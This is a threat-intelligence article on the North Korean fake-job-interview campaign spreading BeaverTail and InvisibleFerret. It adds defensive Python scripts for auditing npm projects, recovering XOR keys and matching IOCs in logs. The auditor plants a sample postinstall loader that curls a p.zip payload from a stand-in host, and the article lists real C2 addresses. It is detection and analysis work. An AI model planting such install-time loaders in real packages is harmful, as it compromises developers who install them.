InvisibleFerret Malware Attacking Windows Users Through Fake Job Interview Tactics


A new wave of North Korean cyberattacks, employing a sophisticated and coordinated approach, has targeted the technology, financial, and cryptocurrency sectors.

Cybersecurity researchers from ANY.RUN report that, by leveraging staged fake job interviews, the operators have deployed malware such as “InvisibleFerret” and “BeaverTail” to compromise victims’ systems and exfiltrate sensitive data.

Dubbed “Contagious Interview” or “DevPopper,” this campaign manipulates unsuspecting software developers by embedding malicious payloads into coding challenges, video call software, or dependencies.

The malware campaign is part of an organized effort by North Korean-linked threat actors to penetrate high-value targets.

“These malicious components do not simply appear randomly among the files of questionable pirated software, lying in wait for their victim. Instead, they are part of an organized effort targeting the technological, financial, and cryptocurrency sectors, with developers as the primary focus.”

The first stage of the attack often involves BeaverTail, a JavaScript-based stealer and loader distributed as an NPM module. BeaverTail downloads a customized Python environment (referred to as “p.zip”) and uses it to execute InvisibleFerret, a Python-based backdoor capable of advanced espionage.
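Because the delivery vehicle is a coding task or a dependency the developer is told to install, the practical defence is to inspect a “challenge” repository before running npm install or opening it in an IDE. The script below is an added example, not ANY.RUN’s tooling and not a signature for BeaverTail: it lists npm lifecycle hooks (which run automatically at install time) and flags JavaScript files that combine several loader-like traits, including a reference to a “p.zip” Python bundle. The indicator set, the threshold of two traits, and the planted sample project (with a TEST-NET address) are all assumptions constructed for the demo.

```python
import json
import os
import re
import tempfile

# Lifecycle hooks npm runs without being asked; a malicious dependency can use
# one of them to launch a loader before the developer opens any file.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Constructed indicators for this example (not a published signature):
# dynamic code execution, process spawning, network fetches, a Python bundle
# named like the "p.zip" from the report, and long hex-escaped string blobs.
INDICATORS = {
    "eval_or_function_ctor": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "child_process": re.compile(r"child_process|\bexecSync\b|\bspawn\s*\("),
    "network_fetch": re.compile(r"\bhttps?://|\bfetch\s*\(|\brequest\s*\(|\baxios\b"),
    "python_bundle": re.compile(r"p\.zip|python(\.exe)?\b", re.IGNORECASE),
    "hex_escape_blob": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
}


def lifecycle_scripts(package_json: dict) -> list:
    """Return (hook, command) pairs that npm would execute automatically."""
    scripts = package_json.get("scripts", {}) or {}
    return [(h, scripts[h]) for h in LIFECYCLE_HOOKS if h in scripts]


def scan_text(text: str) -> list:
    """Names of the indicators present in one JavaScript source file."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def audit_project(root: str) -> list:
    """Walk a checked-out project (node_modules included) and collect findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root)
            if fn == "package.json":
                try:
                    with open(path, encoding="utf-8") as fh:
                        pj = json.load(fh)
                except (OSError, ValueError):
                    continue
                for hook, cmd in lifecycle_scripts(pj):
                    findings.append({"file": rel, "kind": "lifecycle_hook",
                                     "detail": f"{hook}: {cmd}"})
            elif fn.endswith((".js", ".cjs", ".mjs")):
                try:
                    with open(path, encoding="utf-8", errors="replace") as fh:
                        text = fh.read()
                except OSError:
                    continue
                hits = scan_text(text)
                # A single trait is common in legitimate code; require two.
                if len(hits) >= 2:
                    findings.append({"file": rel, "kind": "suspicious_js",
                                     "detail": ",".join(hits)})
    return findings


def build_sample_project() -> str:
    """Create a constructed 'coding challenge' repo with a planted loader."""
    root = tempfile.mkdtemp(prefix="challenge-")
    dep = os.path.join(root, "node_modules", "helper-utils")
    os.makedirs(dep)
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "challenge", "scripts": {"test": "jest"}}, fh)
    with open(os.path.join(dep, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "helper-utils",
                   "scripts": {"postinstall": "node ./init.js"}}, fh)
    with open(os.path.join(dep, "init.js"), "w", encoding="utf-8") as fh:
        # Constructed loader: TEST-NET address, not an indicator from the report.
        fh.write('const cp = require("child_process");\n'
                 'const u = "http://203.0.113.10:1244/p.zip";\n'
                 'cp.execSync("curl -s " + u + " -o p.zip");\n')
    with open(os.path.join(root, "index.js"), "w", encoding="utf-8") as fh:
        fh.write("module.exports = (a, b) => a + b;\n")
    return root


if __name__ == "__main__":
    for f in audit_project(build_sample_project()):
        print(f"{f['kind']:<16} {f['file']}: {f['detail']}")
```

Run it against a real checkout with `audit_project("/path/to/challenge")`; a postinstall hook in a dependency you did not ask for, or a file that both spawns a process and fetches from the network, is reason to open the code in a sandbox rather than on the workstation.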

Try Secure Malware and Phishing Analysis with ANY.RUN’s Interactive Sandbox – 14 Days Free Trial

InvisibleFerret’s Capabilities

InvisibleFerret, the primary malware, demonstrates a sophisticated design despite its messy code. Key features include:

Data Harvesting: It actively seeks source code, cryptocurrency wallets, user credentials, and sensitive files by targeting browser data, clipboard contents, and system directories like Documents and Downloads.

InvisibleFerret actively seeks source code, wallets, and sensitive files

It uses FTP and encrypted connections to exfiltrate data. Files not matching specific extensions are obfuscated using XOR encryption with a hardcoded key.
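Repeating-key XOR with a hardcoded key is obfuscation, not encryption: anyone who captures the exfiltrated blob and knows a few bytes of the original file (a PNG, ZIP or PDF header, for instance) can recover the key and the file. The following is an added example, not code from the malware or from the ANY.RUN report; the key, the sample file and the magic-byte table are constructed for the demo, and the real malware's key is not given on this page. It also shows the failure mode: a known prefix shorter than two key lengths cannot confirm the key, so the recovery routine returns None instead of guessing.

```python
from typing import Optional, Tuple

# Known file-magic prefixes usable as known plaintext (constructed table; extend
# it with the formats the victim environment actually stores).
KNOWN_MAGIC = {
    "pdf": b"%PDF-1.",
    "zip": b"PK\x03\x04",
    "png": b"\x89PNG\r\n\x1a\n",
}


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key restores the input."""
    if not key:
        raise ValueError("key must be non-empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_repeating_key(cipher: bytes, known_prefix: bytes,
                          max_key_len: int = 64) -> Optional[bytes]:
    """Recover a repeating XOR key from a known plaintext prefix.

    cipher XOR plaintext gives the keystream for the known region. The key is
    the shortest period that repeats fully inside that region; if no period
    fits at least twice, the prefix is too short to be sure and None is
    returned rather than a guess.
    """
    n = min(len(cipher), len(known_prefix))
    stream = bytes(c ^ p for c, p in zip(cipher[:n], known_prefix[:n]))
    for period in range(1, min(max_key_len, n // 2) + 1):
        if all(stream[i] == stream[i % period] for i in range(n)):
            return stream[:period]
    return None


def decode_exfil_blob(cipher: bytes,
                      max_key_len: int = 64) -> Optional[Tuple[str, bytes]]:
    """Try each known magic as plaintext; return (file type, decoded bytes) on a hit."""
    for ftype, magic in KNOWN_MAGIC.items():
        key = recover_repeating_key(cipher, magic, max_key_len)
        if key is None:
            continue
        plain = xor_with_key(cipher, key)
        if plain.startswith(magic):
            return ftype, plain
    return None


def demo() -> dict:
    """Constructed sample: a PNG-like file obfuscated with a 4-byte demo key."""
    demo_key = b"\x5a\x13\xc7\x88"  # placeholder for the demo, not the malware's key
    sample_png = KNOWN_MAGIC["png"] + b"\x00\x00\x00\x0dIHDR" + bytes(range(32))
    blob = xor_with_key(sample_png, demo_key)
    # A 4-byte ZIP header cannot confirm a 4-byte key: only 4 keystream bytes known.
    short_blob = xor_with_key(b"PK\x03\x04" + b"rest-of-archive", demo_key)
    return {
        "key": recover_repeating_key(blob, KNOWN_MAGIC["png"]),
        "decoded": decode_exfil_blob(blob),
        "too_short": recover_repeating_key(short_blob, KNOWN_MAGIC["zip"]),
    }


if __name__ == "__main__":
    result = demo()
    print("recovered key:", result["key"].hex())
    print("decoded type :", result["decoded"][0])
    print("zip attempt  :", result["too_short"])
```

When the known prefix is too short, the practical move is to use a longer known plaintext from the same victim (a file you also hold a clean copy of), or to accept a partial key and brute-force the remaining bytes against the file's expected structure.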

The malware implements routines to extract user profiles, cookies, passwords, browsing history, and data from browser extensions, such as crypto wallets (e.g., MetaMask) and password managers (e.g., 1Password).

It downloads and executes legitimate remote desktop software such as AnyDesk to maintain persistent remote access to infected systems.

Legitimate traffic blends with malicious requests, all generated by the same script

InvisibleFerret utilizes Telegram as an additional exfiltration channel by invoking the Bots API to send stolen files to the attacker.

Researchers analyzing InvisibleFerret’s infection chain in the ANY.RUN interactive malware analysis sandbox uncovered its multi-stage attack strategy.

The process begins with initial contact, where victims are lured through fake job interviews involving coding tasks or video calls. Malicious components, such as BeaverTail and InvisibleFerret, are then delivered to the victim’s system.

Once deployed, InvisibleFerret performs system profiling by collecting geolocation data, operating system details, hostnames, and usernames, using legitimate services such as ip-api.com for the geolocation lookup.

Finally, the malware establishes connections to Command-and-Control (C2) servers on unusual ports, 1244 and 1245 in the analyzed samples, to exfiltrate the collected data.


About ANY.RUN

ANY.RUN, an interactive malware analysis platform, played a critical role in dissecting the campaign.

The platform’s real-time malware behavior tracking and integration with the MITRE ATT&CK framework enabled researchers to map out the attackers’ Tactics, Techniques, and Procedures (TTPs).

ANY.RUN Key Features include:

  • Malware detection in seconds with interactive workflows.
  • Comprehensive insight into malware behavior for both Windows and Linux systems.
  • Scalable solutions for team collaboration and threat analysis.

The InvisibleFerret malware campaign serves as a reminder of the evolving tactics employed by adversaries.

Cybersecurity experts stress the importance of vigilance and proactive measures to protect sensitive information from falling into the wrong hands.

Always remain cautious of suspicious recruitment activities and software downloads, as even the most professional-seeming scenarios could be traps engineered by malicious actors.

This campaign highlights an alarming trend in cyber espionage, targeting industries with high-value intellectual property or financial assets. The combination of social engineering and tailored malware demonstrates the lengths to which threat actors will go to achieve their objectives.

  • Always verify the authenticity of job offers and interview processes.
  • Avoid executing unverified software, especially on corporate devices.
  • Use robust endpoint protection, sandboxing solutions, and multi-factor authentication to mitigate risks.
  • Train employees on recognizing phishing and social engineering tactics.

Indicators of Compromise (IOCs)

Researchers identified the following IOCs tied to this campaign:

  • SHA256 Hashes:
      • 47830f7007b4317dc8ce1b16f3ae79f9f7e964db456c34e00473fba94bb713eb
      • 6a104f07ab6c5711b6bc8bf6ff956ab8cd597a388002a966e980c5ec9678b5b0
  • IP Addresses:
      • 147[.]124[.]214[.]129
      • 173[.]211[.]106[.]101
  • URLs:
      • http://147[.]124[.]214[.]129:1244
      • http://173[.]211[.]106[.]101:1245
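The IOCs above and the behaviours described earlier (the ip-api.com profiling lookup, the Telegram Bot API uploads, and the C2 traffic on ports 1244 and 1245) translate directly into detection logic for proxy or endpoint network logs. The script below is an added example, not ANY.RUN’s detection content: it refangs the published IPs, parses a constructed key=value log format, and tags each connection that matches an IOC, a geolocation lookup, or a Telegram bot upload, redacting the bot token so it is not copied into tickets. The log lines, the non-IOC addresses (TEST-NET ranges) and the bot token are all constructed for the demo.

```python
import re
from typing import Optional
from urllib.parse import urlsplit

# IOCs from the report, kept in their defanged published form and refanged at load.
IOC_IPS_DEFANGED = ["147[.]124[.]214[.]129", "173[.]211[.]106[.]101"]
IOC_PORTS = {1244, 1245}


def refang(value: str) -> str:
    """Turn the defanged publication form back into a matchable value."""
    return value.replace("[.]", ".").replace("hxxp", "http")


IOC_IPS = {refang(ip) for ip in IOC_IPS_DEFANGED}

# Behaviours from the report: geolocation via ip-api.com and Telegram Bot API uploads.
GEO_HOSTS = {"ip-api.com"}
TELEGRAM_BOT = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]+)/(sendDocument|sendMessage)")

# Constructed log format: "<ts> host=<h> proc=<p> dst=<ip> dport=<n> [url=<u>]".
LINE_RX = re.compile(r"(?P<ts>\S+)\s+host=(?P<host>\S+)\s+proc=(?P<proc>\S+)\s+(?P<rest>.*)")
KV_RX = re.compile(r"(\w+)=(\S+)")


def parse_line(line: str) -> Optional[dict]:
    m = LINE_RX.match(line.strip())
    if not m:
        return None
    rec = {"ts": m["ts"], "host": m["host"], "proc": m["proc"]}
    rec.update(KV_RX.findall(m["rest"]))
    return rec


def classify(rec: dict) -> list:
    """Tags for one connection record; may also add a redacted bot token to rec."""
    tags = []
    if rec.get("dst") in IOC_IPS:
        tags.append("ioc_ip")
    if rec.get("dport") and int(rec["dport"]) in IOC_PORTS:
        tags.append("ioc_port")
    url = rec.get("url")
    if url:
        parts = urlsplit(url)
        if parts.hostname in GEO_HOSTS:
            tags.append("geolocation_lookup")
        m = TELEGRAM_BOT.match(parts.path)
        if parts.hostname == "api.telegram.org" and m:
            tags.append("telegram_bot_exfil")
            # Keep the bot id and a short prefix of the secret; enough to pivot on.
            rec["bot_token_redacted"] = f"{m.group(1)}:{m.group(2)[:4]}..."
    return tags


def scan_logs(lines) -> list:
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        tags = classify(rec)
        if tags:
            alert = {"ts": rec["ts"], "host": rec["host"], "proc": rec["proc"], "tags": tags}
            if "bot_token_redacted" in rec:
                alert["bot_token_redacted"] = rec["bot_token_redacted"]
            alerts.append(alert)
    return alerts


# Constructed sample log; 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges.
SAMPLE_LOG = """\
2025-01-07T10:02:11Z host=DEV-01 proc=python.exe dst=198.51.100.10 dport=80 url=http://ip-api.com/json/
2025-01-07T10:02:13Z host=DEV-01 proc=python.exe dst=147.124.214.129 dport=1244 url=http://147.124.214.129:1244/
2025-01-07T10:02:20Z host=DEV-01 proc=python.exe dst=198.51.100.20 dport=443 url=https://api.telegram.org/bot1234567890:AAEexampleTOKENvalue_abc/sendDocument
2025-01-07T10:03:02Z host=DEV-01 proc=chrome.exe dst=203.0.113.5 dport=443 url=https://www.example.com/
2025-01-07T10:05:41Z host=DEV-02 proc=python.exe dst=173.211.106.101 dport=1245
"""

if __name__ == "__main__":
    for a in scan_logs(SAMPLE_LOG.splitlines()):
        print(a)
```

The port-only match is deliberately a separate tag: a connection to 1244 or 1245 from an unrelated process is weak on its own, but the same tag on python.exe, shortly after an ip-api.com lookup from the same host, is the sequence the report describes.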



